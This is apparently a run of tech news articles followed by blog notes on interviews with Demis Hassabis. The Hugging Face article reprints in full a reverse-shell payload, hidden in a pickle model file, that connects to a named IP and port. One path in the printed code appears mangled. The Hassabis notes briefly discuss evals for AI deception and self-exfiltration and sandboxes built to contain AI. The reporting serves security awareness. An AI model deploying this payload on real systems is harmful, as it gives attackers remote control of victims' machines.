Author name: Mike M.

report:-boeing-may-reacquire-spirit-at-higher-price-despite-hating-optics

Report: Boeing may reacquire Spirit at higher price despite hating optics

Still up in the air —

Spirit was initially spun out from Boeing Commercial Airplanes in 2005.

Report: Boeing may reacquire Spirit at higher price despite hating optics

Amid safety scandals involving “many loose bolts” and widespread problems with Boeing’s 737 Max 9s, Boeing is apparently considering buying back Spirit AeroSystems, the key supplier behind some of Boeing’s current manufacturing problems, sources told The Wall Street Journal.

Spirit was initially spun out from Boeing Commercial Airplanes in 2005, and Boeing had planned to keep it that way. Last year, Boeing CEO Dave Calhoun sought to dispel rumors that Boeing might reacquire Spirit as federal regulators launched investigations into both companies. But now Calhoun appears to be “softening that stance,” the WSJ reported.

According to the WSJ’s sources, no deal has formed yet, but Spirit has initiated talks with Boeing and “hired bankers to explore strategic options.” Sources also confirmed that Spirit is weighing whether to sell its operations in Ireland, which manufactures parts for Boeing rival Airbus.

Perhaps paving the way for these talks, Spirit replaced its CEO last fall with a former Boeing executive, Patrick Shanahan. In a press release noting that Spirit relies “on Boeing for a significant portion of our revenues,” Spirit touted Shanahan as a “seasoned executive” with 31 years at Boeing, and Shanahan promised to “stabilize” Spirit’s operations.

If Boeing reacquired Spirit, it might help reduce backlash over Boeing outsourcing manufacturing of its planes, but it likely wouldn’t help Boeing escape the ongoing scrutiny. While the WSJ reported that “Spirit parts frequently arrive” at the Boeing factory “with defects,” it was “a snafu at Boeing’s factory” that led Alaska Airlines to ground 65 Boeing aircraft over safety concerns after a mid-aircraft door detached mid-flight, endangering passengers and crew.

Sources later revealed that it was Boeing employees who failed to put bolts back in when they reinstalled a door plug, reportedly causing the malfunction that forced Alaska Airlines to make an emergency landing. As a result, Boeing withdrew from a safety exemption that it had requested “to prematurely allow the 737 Max 7 to enter commercial service.” At that time, US Sen. Tammy Duckworth (D-Ill.) accused Boeing of a “bold-face attempt to put profits over the safety of the flying public.”

Purchasing Spirit would appear to be a last resort for Boeing, the WSJ reported, noting that so far, “Boeing has done everything short of acquiring Spirit in an effort to gain control over the supplier.”

But Reuters confirmed the WSJ’s report with an industry source, so it seems like perhaps Boeing increasingly feels it has no other options left despite working closely with Shanahan for the past few months to keep Spirit’s troubles from impacting Boeing’s bottom line. One industry source told Reuters that in the time since Boeing spun off Spirit, “the optics of buying at a higher price were among the factors that discouraged such a move.”

For Spirit, which attributes nearly two-thirds of its revenues to Boeing, the WSJ reported, being brought back into the Boeing fold could be the only way to survive these turbulent times. Currently valued at about $3.3 billion, Spirit has struggled for months to shore up a commercial agreement with Airbus and notably failed to stabilize after receiving a “$100 million cash infusion from Boeing” last year, the WSJ reported.

But for Boeing, the obvious downside of the purchase would be taking on Spirit’s mess at the same time Boeing is trying to clean up its own image.

Report: Boeing may reacquire Spirit at higher price despite hating optics Read More »

us-prescription-market-hamstrung-for-9-days-(so-far)-by-ransomware-attack

US prescription market hamstrung for 9 days (so far) by ransomware attack

RX CHAOS —

Patients having trouble getting lifesaving meds have the AlphV crime group to thank.

US prescription market hamstrung for 9 days (so far) by ransomware attack

Getty Images

Nine days after a Russian-speaking ransomware syndicate took down the biggest US health care payment processor, pharmacies, health care providers, and patients were still scrambling to fill prescriptions for medicines, many of which are lifesaving.

On Thursday, UnitedHealth Group accused a notorious ransomware gang known both as AlphV and Black Cat of hacking its subsidiary Optum. Optum provides a nationwide network called Change Healthcare, which allows health care providers to manage customer payments and insurance claims. With no easy way for pharmacies to calculate what costs were covered by insurance companies, many had to turn to alternative services or offline methods.

The most serious incident of its kind

Optum first disclosed on February 21 that its services were down as a result of a “cyber security issue.” Its service has been hamstrung ever since. Shortly before this post went live on Ars, Optum said it had restored Change Healthcare services.

“Working with technology and business partners, we have successfully completed testing with vendors and multiple retail pharmacy partners for the impacted transaction types,” an update said. “As a result, we have enabled this service for all customers effective 1 pm CT, Friday, March 1, 2024.”

AlphV is one of many syndicates that operates under a ransomware-as-a-service model, meaning affiliates do the actual hacking of victims and then use the AlphV ransomware and infrastructure to encrypt files and negotiate a ransom. The parties then share the proceeds.

In December, the FBI and its equivalent in partner countries announced they had seized much of the AlphV infrastructure in a move that was intended to disrupt the group. AlphV promptly asserted it had unseized its site, leading to a tug-of-war between law enforcement and the group. The crippling of Change Healthcare is a clear sign that AlphV continues to pose a threat to critical parts of the US infrastructure.

“The cyberattack against Change Healthcare that began on Feb. 21 is the most serious incident of its kind leveled against a US health care organization,” said Rick Pollack, president and CEO of the American Hospital Association. Citing Change Healthcare data, Pollack said that the service processes 15 billion transactions involving eligibility verifications, pharmacy operations, and claims transmittals and payments. “All of these have been disrupted to varying degrees over the past several days and the full impact is still not known.”

Optum estimated that as of Monday, more than 90 percent of roughly 70,000 pharmacies in the US had changed how they processed electronic claims as a result of the outage. The company went on to say that only a small number of patients have been unable to get their prescriptions filled.

The scale and length of the Change Healthcare outage underscore the devastating effects ransomware has on critical infrastructure. Three years ago, members affiliated with a different ransomware group known as Darkside caused a five-day outage of Colonial Pipeline, which delivered roughly 45 percent of the East Coast’s petroleum products, including gasoline, diesel fuel, and jet fuel. The interruption caused fuel shortages that sent airlines, consumers, and filling stations scrambling.

Numerous ransomware groups have also taken down entire hospital networks in outages that in some cases have threatened patient care.

AlphV has been a key contributor to the ransomware menace. The FBI said in December the group had collected more than $300 million in ransoms. One of the better-known victims of AlphV ransomware was Caesars Entertainment and casinos owned by MGM, which brought operations in many Las Vegas casinos to a halt. A group of mostly teenagers is suspected of orchestrating that breach.

US prescription market hamstrung for 9 days (so far) by ransomware attack Read More »

whatsapp-finally-forces-pegasus-spyware-maker-to-share-its-secret-code

WhatsApp finally forces Pegasus spyware maker to share its secret code

In on the secret —

Israeli spyware maker loses fight to only share information on installation.

WhatsApp finally forces Pegasus spyware maker to share its secret code

WhatsApp will soon be granted access to explore the “full functionality” of the NSO Group’s Pegasus spyware—sophisticated malware the Israeli Ministry of Defense has long guarded as a “highly sought” state secret, The Guardian reported.

Since 2019, WhatsApp has pushed for access to the NSO’s spyware code after alleging that Pegasus was used to spy on 1,400 WhatsApp users over a two-week period, gaining unauthorized access to their sensitive data, including encrypted messages. WhatsApp suing the NSO, Ars noted at the time, was “an unprecedented legal action” that took “aim at the unregulated industry that sells sophisticated malware services to governments around the world.”

Initially, the NSO sought to block all discovery in the lawsuit “due to various US and Israeli restrictions,” but that blanket request was denied. Then, last week, the NSO lost another fight to keep WhatsApp away from its secret code.

As the court considered each side’s motions to compel discovery, a US district judge, Phyllis Hamilton, rejected the NSO’s argument that it should only be required to hand over information about Pegasus’ installation layer.

Hamilton sided with WhatsApp, granting the Meta-owned app’s request for “information concerning the full functionality of the relevant spyware,” writing that “information showing the functionality of only the installation layer of the relevant spyware would not allow plaintiffs to understand how the relevant spyware performs the functions of accessing and extracting data.”

WhatsApp has alleged that Pegasus can “intercept communications sent to and from a device, including communications over iMessage, Skype, Telegram, WeChat, Facebook Messenger, WhatsApp, and others” and that it could also be “customized for different purposes, including to intercept communications, capture screenshots, and exfiltrate browser history.”

To prove this, WhatsApp needs access to “all relevant spyware”—specifically “any NSO spyware targeting or directed at WhatsApp servers, or using WhatsApp in any way to access Target Devices”—for “a period of one year before the alleged attack to one year after the alleged attack,” Hamilton concluded.

The NSO has so far not commented on the order, but WhatsApp was pleased with this outcome.

“The recent court ruling is an important milestone in our long running goal of protecting WhatsApp users against unlawful attacks,” WhatsApp’s spokesperson told The Guardian. “Spyware companies and other malicious actors need to understand they can be caught and will not be able to ignore the law.”

But Hamilton did not grant all of WhatsApp’s requests for discovery, sparing the NSO from sharing specific information regarding its server architecture because WhatsApp “would be able to glean the same information from the full functionality of the alleged spyware.”

Perhaps more significantly, the NSO also won’t be compelled to identify its clients. While the NSO does not publicly name the governments that purchase its spyware, reports indicate that Poland, Saudi Arabia, Rwanda, India, Hungary, and the United Arab Emirates have used it to target dissidents, The Guardian reported. In 2021, the US blacklisted the NSO for allegedly spreading “digital tools used for repression.”

In the same order, Hamilton also denied the NSO’s request to compel WhatsApp to share its post-complaint communications with the Citizen Lab, which served as a third-party witness in the case to support WhatsApp’s argument that “Pegasus is misused by NSO’s customers against ‘civil society.’”

It appeared that the NSO sought WhatsApp’s post-complaint communications with Citizen Lab as a way to potentially pressure WhatsApp into dropping Citizen Lab’s statement from the record. Hamilton quoted a court filing from the NSO that curiously noted: “If plaintiffs would agree to withdraw from their case Citizen Lab’s contention that Pegasus was used against members of ‘civil society’ rather than to investigate terrorism and serious crime, there would be much less need for this discovery.”

Ultimately, Hamilton denied the NSO’s request because “the court fails to see the relevance of the requested discovery.”

As discovery in the case proceeds, the court expects to receive expert disclosures from each side on August 30 before the trial, which is expected to start on March 3, 2025.

WhatsApp finally forces Pegasus spyware maker to share its secret code Read More »

huge-funding-round-makes-“figure”-big-tech’s-favorite-humanoid-robot-company

Huge funding round makes “Figure” Big Tech’s favorite humanoid robot company

They’ve got an aluminum CNC machine, and they aren’t afraid to use it —

Investors Microsoft, OpenAI, Nvidia, Jeff Bezos, and Intel value Figure at $2.6B.

The Figure 01 and a few spare parts. Obviously they are big fans of aluminum.

Enlarge / The Figure 01 and a few spare parts. Obviously they are big fans of aluminum.

Figure

Humanoid robotics company Figure AI announced it raised $675 million in a funding round from an all-star cast of Big Tech investors. The company, which aims to commercialize a humanoid robot, now has a $2.6 billion valuation. Participants in the latest funding round include Microsoft, the OpenAI Startup Fund, Nvidia, Jeff Bezos’ Bezos Expeditions, Parkway Venture Capital, Intel Capital, Align Ventures, and ARK Invest. With all these big-name investors, Figure is officially Big Tech’s favorite humanoid robotics company. The manufacturing industry is taking notice, too. In January, Figure even announced a commercial agreement with BMW to have robots work on its production line.

“In conjunction with this investment,” the press release reads, “Figure and OpenAI have entered into a collaboration agreement to develop next generation AI models for humanoid robots, combining OpenAI’s research with Figure’s deep understanding of robotics hardware and software. The collaboration aims to help accelerate Figure’s commercial timeline by enhancing the capabilities of humanoid robots to process and reason from language.”

With all this hype and funding, the robot must be incredible, right? Well, the company is new and only unveiled its first humanoid “prototype,” the “Figure 01,” in October. At that time, the company said it represented about 12 months of work. With veterans from “Boston Dynamics, Tesla, Google DeepMind, and Archer Aviation,” the company has a strong starting point.

  • Ok, it’s time to pick up a box, so get out your oversized hands and grab hold.

    Figure

  • Those extra-big hands seem to be the focus of the robot. They are just incredibly complex and look to be aiming at a 1:1 build of a human hand.

    Figure

  • Just look at everything inside those fingers. It looks like there are tendons of some kind.

    Figure

  • Not impressed with this “pooped your pants” walk cycle, which doesn’t really use the knees or ankles.

    Figure

  • A lot of the hardware appears to be waiting for software to use it, like the screen that serves as the robot’s face. It only seems to run a screen saver.

    Figure

The actual design of the robot appears to be solid aluminum and electrically actuated, aiming for an exact 1:1 match for a human. The website says the goal is a 5-foot 6-inch, 130-lb humanoid that can lift 44 pounds. That’s a very small form-over-function package to try and fit all these robot parts into. For alternative humanoid designs, you’ve got Boston Dynamics’ Atlas, which is more of a hulking beast thanks to the function-over-form design. There’s also the more purpose-built “Digit” from Agility Robotics, which has backward-bending bird legs for warehouse work, allowing it to bend down in front of a shelf without having to worry about the knees colliding with anything.

The best insight into the company’s progress is the official YouTube channel, which shows the Figure 01 robot doing a few tasks. The last video, from a few days ago, showed a robot doing a “fully autonomous” box-moving task at “16.7 percent” of normal human speed. For a bipedal robot, I have to say the walking is not impressive. Figure has a slow, timid shuffle that only lets it wobble forward at a snail’s pace. The walk cycle is almost entirely driven by the hips. The knees are bent the entire time and always out in front of the robot; the ankles barely move. It seems only to be able to walk in a straight line, and turning is a slow stop-and-spin-in-place motion that has the feet peddling in place the entire time. The feet seem to move at a constant up-and-down motion even when the robot isn’t moving forward, almost as if foot planning just runs on a set timer for balance. It can walk, but it walks about as slowly and awkwardly as a robot can. A lot of the hardware seems built for software that isn’t ready yet.

Figure seems more focused on the hands than anything. The 01 has giant oversized hands that are a close match for a human’s, with five fingers, all with three joints each. In January, Figure posted a video of the robot working a Keurig coffee maker. That means flipping up the lid with a fingertip, delicately picking up an easily crushable plastic cup with two fingers, dropping it into the coffee maker, casually pushing the lid down with about three different fingers, and pressing the “go” button with a single finger. It’s impressive to not destroy the coffee maker or the K-cup, but that Keurig is still living a rough life—a few of the robot interactions incidentally lift one side or the other of the coffee maker off the table thanks to way too much force.

  • For some very delicate hand work, here’s the Figure 01 making coffee. They went and sourced a silver Keurig machine so this image only contains two colors, black and silver.

    Figure

  • Time to press the “go” button. Also is that a wrist-mounted lidar puck for vision? Occasionally, flashes of light shoot out of it in the video.

    Figure

  • These hand close-ups are just incredible. I really do think they are tendon-actuated. You can also see all sorts of pads on the inside of the hand.

    Figure

  • I love the ridiculous T-pose it assumes while it waits for coffee.

    Figure

The video says the coffee task was performed via an “end-to-end neural network” using 10 hours of training time. Unlike walking, the hands really feel like they have a human influence when it comes to their movement. When the robot picks up the K-cup via a pinch of its thumb and index finger or goes to push a button, it also closes the other three fingers into a fist. There isn’t a real reason to move the three fingers that aren’t doing anything, but that’s what a human would do, so presumably, it’s in the training data. Closing the lid is interesting because I don’t think you could credit a single finger with the task—it’s just kind of a casual push using whatever fingers connect with the lid. The last clip of the video even shows the Figure 01 correcting a mistake—the K-cup doesn’t sit in the coffee maker correctly, and the robot recognizes this and can poke it around until it falls into place.

A lot of assembly line jobs are done at a station or sitting down, so the focus on hand dexterity makes sense. Boston Dynamics’ Atlas is way more impressive as a walking robot, but that’s also a multi-million dollar research bot that will never see the market. Figure’s goal, according to the press release, is to “bring humanoid robots into commercial operations as soon as possible.” The company openly posts a “master plan” on its website, which reads, “1) Build a feature-complete electromechanical humanoid. 2) Perform human-like manipulation. 3) Integrate humanoids into the labor force.” The robots are coming for our jobs.

Huge funding round makes “Figure” Big Tech’s favorite humanoid robot company Read More »

apple-changes-course,-will-keep-iphone-eu-web-apps-how-they-are-in-ios-17.4

Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4

Digital Markets Act —

Alternative browsers can pin web apps, but they only run inside Apple’s WebKit.

EU legislation has pushed a number of changes previously thought unthinkable in Apple products, including USB-C ports in iPhones sold in Europe.

Enlarge / EU legislation has pushed a number of changes previously thought unthinkable in Apple products, including USB-C ports in iPhones sold in Europe.

Getty Images

Apple has changed its stance on allowing web apps on iPhones and iPads in Europe and will continue to let users put them on their home screens after iOS 17.4 arrives. They will, however, have to be “built directly on WebKit and its security architecture,” rather than running in alternative browsers, which is how it had worked up until new legislation forced the issue.

After the European Union’s Digital Markets Act (DMA) demanded Apple open up its mobile devices to alternative browser engines, the company said it would remove the ability to install home screen web apps entirely. In a developer Q&A section, under the heading “Why don’t users in the EU have access to Home Screen web apps?”, Apple said that “the complex security and privacy concerns” of non-native web apps and what addressing them would require “given the other demands of the DMA and the very low user adoption of Home Screen web apps,” made it so that the company “had to remove the Home Screen web apps feature in the EU.” Any web app installed on a user’s home screen would have simply led them back to their preferred web browser.

Apple further warned against “malicious web apps,” which, without the isolation built into its WebKit system, could read data, steal permissions from other web apps, and install further web apps without permission, among other concerns.

That response prompted an inquiry by the European Commission officials, who asked Apple and app developers about the impact of a potential removal of home screen web apps. It also prompted a survey conducted by the Open Web Advocacy group. Apple has until March 6 to comply with the DMA. Apple’s move to block web apps entirely suggested that allowing web apps powered by Safari, but not other browser engines, might violate the DMA’s rules. Now, some aspect of that cautious approach has changed.

Under an updated version of that section heading, Apple reiterates its security and privacy concerns and the need to “build new integration architecture that does not currently exist in iOS.” But because of requests to continue web app offerings, “we will continue to offer the existing Home Screen capability in the EU,” Apple writes.

The long, weird road to where web apps are now

Apple has long offered web apps (or Progressive Web Apps) that opened as a separate application rather than in a browser tab. Web apps installed this way offer greater persistence and access to device features, like notifications, cameras, or file storage. Web apps were initially touted by Apple co-founder and then-CEO Steve Jobs as “everything you need” to write “amazing apps” rather than dedicated apps with their own SDK. Four months later, an iPhone SDK was announced, and Apple declared its enthusiastic desire for “native third-party applications on the iPhone.”

While Apple does not break out App Store revenues in its earning statements, its Services division recorded an all-time high of $22.3 billion in the company’s fourth quarter of 2023, including “all time revenue records” across the App Store and other offerings.

As part of its DMA compliance as a “gatekeeper” of certain systems, Apple must also allow for sideloading for EU customers, or allowing the installation of iOS apps from stores other than its own official App Store. This week, more than two dozen companies signed a letter to the Commission lamenting Apple’s implementation of App Store rules. Developers seeking to utilize alternative app stores will have to agree to terms that include a “Core Technology Fee,” demanding a 0.50 euro fee for each app, each year, after 1 million downloads. “Few app developers will agree to these unjust terms,” the letter claims, and will thereby further “Apple’s exploitation of its dominance over app developers.”

In a statement provided to Ars, Apple said that its “approach to the Digital Markets Act was guided by two simple goals: complying with the law and reducing the inevitable, increased risks the DMA creates for our EU users.” It noted that Apple employees “spent months in conversation with the European Commission,” and had “in little more than a year, created more than 600 new APIs and a wide range of developer tools.” Still, Apple said, the changes and safeguards it put in place can’t entirely “eliminate new threats the DMA creates,” and the changes “will result in a less secure system.”

That is why, Apple said, it is limiting third-party browser engines, app stores, and other DMA changes to the European Union. “[W]e’re concerned about their impacts on the privacy and security of our users’ experience—which remains our North Star.”

Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4 Read More »

hugging-face,-the-github-of-ai,-hosted-code-that-backdoored-user-devices

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »

judge-mocks-x-for-“vapid”-argument-in-musk’s-hate-speech-lawsuit

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit

It looks like Elon Musk may lose X’s lawsuit against hate speech researchers who encouraged a major brand boycott after flagging ads appearing next to extremist content on X, the social media site formerly known as Twitter.

X is trying to argue that the Center for Countering Digital Hate (CCDH) violated the site’s terms of service and illegally accessed non-public data to conduct its reporting, allegedly posing a security risk for X. The boycott, X alleged, cost the company tens of millions of dollars by spooking advertisers, while X contends that the CCDH’s reporting is misleading and ads are rarely served on extremist content.

But at a hearing Thursday, US district judge Charles Breyer told the CCDH that he would consider dismissing X’s lawsuit, repeatedly appearing to mock X’s decision to file it in the first place.

Seemingly skeptical of X’s entire argument, Breyer appeared particularly focused on how X intended to prove that the CCDH could have known that its reporting would trigger such substantial financial losses, as the lawsuit hinges on whether the alleged damages were “foreseeable,” NPR reported.

X’s lawyer, Jon Hawk, argued that when the CCDH joined Twitter in 2019, the group agreed to terms of service that noted those terms could change. So when Musk purchased Twitter and updated rules to reinstate accounts spreading hate speech, the CCDH should have been able to foresee those changes in terms and therefore anticipate that any reporting on spikes in hate speech would cause financial losses.

According to CNN, this is where Breyer became frustrated, telling Hawk, “I’m trying to figure out in my mind how that’s possibly true, because I don’t think it is.”

“What you have to tell me is, why is it foreseeable?” Breyer said. “That they should have understood that, at the time they entered the terms of service, that Twitter would then change its policy and allow this type of material to be disseminated?

“That, of course, reduces foreseeability to one of the most vapid extensions of law I’ve ever heard,” Breyer added. “‘Oh, what’s foreseeable is that things can change, and therefore, if there’s a change, it’s ‘foreseeable.’ I mean, that argument is truly remarkable.”

According to NPR, Breyer suggested that X was trying to “shoehorn” its legal theory by using language from a breach of contract claim, when what the company actually appeared to be alleging was defamation.

“You could’ve brought a defamation case; you didn’t bring a defamation case,” Breyer said. “And that’s significant.”

Breyer directly noted that one reason why X might not bring a defamation suit was if the CCDH’s reporting was accurate, NPR reported.

CCDH’s CEO and founder, Imran Ahmed, provided a statement to Ars, confirming that the group is “very pleased with how yesterday’s argument went, including many of the questions and comments from the court.”

“We remain confident in the strength of our arguments for dismissal,” Ahmed said.

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit Read More »

notes-on-dwarkesh-patel’s-podcast-with-demis-hassabis

Notes on Dwarkesh Patel’s Podcast with Demis Hassabis

Demis Hassabis was interviewed twice this past week.

First, he was interviewed on Hard Fork. Then he had a much more interesting interview with Dwarkesh Patel.

This post covers my notes from both interviews, mostly the one with Dwarkesh.

Hard Fork was less fruitful, because they mostly asked what for me are the wrong questions and mostly get answers I presume Demis has given many times. So I only noticed two things, neither of which is ultimately surprising.

  1. They do ask about The Gemini Incident, although only about the particular issue with image generation. Demis gives the generic ‘it should do what the user wants and this was dumb’ answer, which I buy he likely personally believes.

  2. When asked about p(doom) he expresses dismay about the state of discourse and says around 42: 00 that ‘well Geoffrey Hinton and Yann LeCun disagree so that indicates we don’t know, this technology is so transformative that it is unknown. It is nonsense to put a probability on it. What I do know is it is non-zero, that risk, and it is worth debating and researching carefully… we don’t want to wait until the eve of AGI happening.’ He says we want to be prepared even if the risk is relatively small, without saying what would count as small. He also says he hopes in five years to give us a better answer, which is evidence against him having super short timelines.

I do not think this is the right way to handle probabilities in your own head. I do think it is plausibly a smart way to handle public relations around probabilities, given how people react when you give a particular p(doom).

I am of course deeply disappointed that Demis does not think he can differentiate between the arguments of Geoffrey Hinton versus Yann LeCun, and the implied importance on the accomplishments and thus implied credibility of the people. He did not get that way, or win Diplomacy championships, thinking like that. I also don’t think he was being fully genuine here.

Otherwise, this seemed like an inessential interview. Demis did well but was not given new challenges to handle.

Demis Hassabis also talked to Dwarkesh Patel, which is of course self-recommending. Here you want to pay attention, and I paused to think things over and take detailed notes. Five minutes in I had already learned more interesting things than I did from the entire Hard Fork interview.

Here is the transcript, which is also helpful.

  1. (1: 00) Dwarkesh first asks Demis about the nature of intelligence, whether it is one broad thing or the sum of many small things. Demis says there must be some common themes and underlying mechanisms, although there are also specialized parts. I strongly agree with Demis. I do not think you can understand intelligence, of any form, without some form the concept of G.

  2. (1: 45) Dwarkesh follows up by asking then why doesn’t lots of data in one domain generalize to other domains? Demis says often it does, such as coding improving reasoning (which also happens in humans), and he expects more chain transfer.

  3. (4: 00) Dwarkesh asks what insights neuroscience brings to AI. Demis points to many early AI concepts. Going forward, questions include how brains form world models or memory.

  4. (6: 00) Demis thinks scaffolding via tree search or AlphaZero-style approaches for LLMs is super promising. He notes they’re working hard on search efficiency in many of their approaches so they can search further.

  5. (9: 00) Dwarkesh notes that Go and Chess have clear win conditions, real life does not, asks what to do about this. Demis agrees this is a challenge, but that usually ‘in scientific problems’ there are ways to specify goals. Suspicious dodge?

  6. (10: 00) Dwarkesh notes humans are super sample efficient, Demis says it is because we are not built for Monty Carlo tree search, so we use our intuition to narrow the search.

  7. (12: 00) Demis is optimistic about LLM self-play and synthetic data, but we need to do more work on what makes a good data set – what fills in holes, what fixes potential bias and makes it representative of the distribution you want to learn. Definitely seems underexplored.

  8. (14: 00) Dwarkesh asks what techniques are underrated now. Demis says things go in and out of fashion, that we should bring back old ideas like reinforcement and Q learning and combine them with the new ones. Demis really believes games are The Way, it seems.

  9. (15: 00) Demis thinks AGI could in theory come from full AlphaZero-style approaches and some people are working on that, with no priors, which you can then combine with known data, and he doesn’t see why you wouldn’t combine planning search with outside knowledge.

  10. (16: 45) Demis notes everyone has been surprised how well scaling hypothesis has held up and systems have gotten grounding and learned concepts, and that language and human feedback can contain so much grounding. From Demis: “I think we’ve got to push scaling as hard as we can, and that’s what we’re doing here. And it’s an empirical question whether that will hit an asymptote or a brick wall, and there are different people argue about that. But actually, I think we should just test it. I think no one knows. But in the meantime, we should also double down on innovation and invention.” He’s roughly splitting his efforts in half, scaling versus new ideas. He’s taking the ‘hit a wall’ hypothesis seriously.

  11. (20: 00) Demis says systems need to be grounded (in the physical world and its causes and effects) to achieve their goals and various advances are forms of this grounding, systems will understand physics better, references need for robotics.

  12. (21: 30) Dwarkesh asks about the other half, grounding in human preferences, what it takes to align a system smarter than humans. Demis says that has been at forefront of Shane and his minds since before founding DeepMind, they had to plan for success and ensure systems are understandable and controllable. The part that addresses details:

Demis Hassabis: And I think there are sort of several, this will be a whole sort of discussion in itself, but there are many, many ideas that people have from much more stringent eval systems. I think we don’t have good enough evaluations and benchmarks for things like, can the system deceive you? Can it exfiltrate its own code, sort of undesirable behaviors?

And then there are ideas of actually using AI, maybe narrow AIs, so not general learning ones, but systems that are specialized for a domain to help us as the human scientists analyze and summarize what the more general system is doing. Right. So kind of narrow AI tools.

I think that there’s a lot of promise in creating hardened sandboxes or simulations that are hardened with cybersecurity arrangements around the simulation, both to keep the AI in, but also as cybersecurity to keep hackers out. And then you could experiment a lot more freely within that sandbox domain.

And I think a lot of these ideas are, and there’s many, many others, including the analysis stuff we talked about earlier, where can we analyze and understand what the concepts are that this system is building, what the representations are, so maybe they’re not so alien to us and we can actually keep track of the kind of knowledge that it’s building.

It has been over fourteen years of thinking hard about these questions, and this is the best Demis has been able to come up with. They’re not bad ideas. Incrementally they seem helpful. They don’t constitute an answer or full path to victory or central form of a solution. They are more like a grab bag of things one could try incrementally. We are going to need to do better than that.

  1. (24: 00) Dwarkesh asks timelines, notes Shane said median of 2028. Demis sort of dodges and tries to not get pinned down but implies AGI-like systems are on track for 2030 and says he wouldn’t be surprised to get them ‘in the next decade.’

  2. (25: 00) Demis agrees AGI accelerating AI (RSI) is possible, says it depends on what we use the first AGI systems for, warning of the safety implications. The obvious follow-up question is: How would society make a choice to not use the first AGI systems for exactly this? He needs far more understanding to know even what we would need to know to know if this feedback loop was imminent.

  3. (26: 30) Demis notes deception is a root node that you very much do not want, ideally you want the AGI to give you post-hoc explanations. I increasingly think people are considering ‘deception’ as distinct from non-deception in a way that does not reflect reality, and it is an expensive and important confusion.

  4. (27: 40): Dwarkesh asks, what observations would it take to make Demis halt training of Gemini 2 because it was too dangerous? Demis answers reasonably but generically, saying we should test in sandboxes for this reason and that such issues might come up in a few years but aren’t of concern now, that the system lying about defying our instructions might be one trigger. And that then you would, ideally, ‘pause and get to the bottom of why it was doing those things’ before continuing. More conditional alarm, more detail, and especially more hard commitment, seems needed here.

  5. (28: 50) Logistical barriers are the main reason Gemini didn’t scale bigger, also you need to adjust all your parameters and go incrementally, not go more than one order of magnitude at a time. You can predict ‘training loss’ farther out but that does not tell you about actual capabilities you care about. A surprising thing about Gemini was the relationship between scoring on target metrics versus ultimate practical capabilities.

  6. (31: 30) Says Gemini 1.0 used about as much compute as ‘has been rumored for’ GPT-4. Google will have the most compute, they hope to make good use of that, and the things that scale best are what matter most.

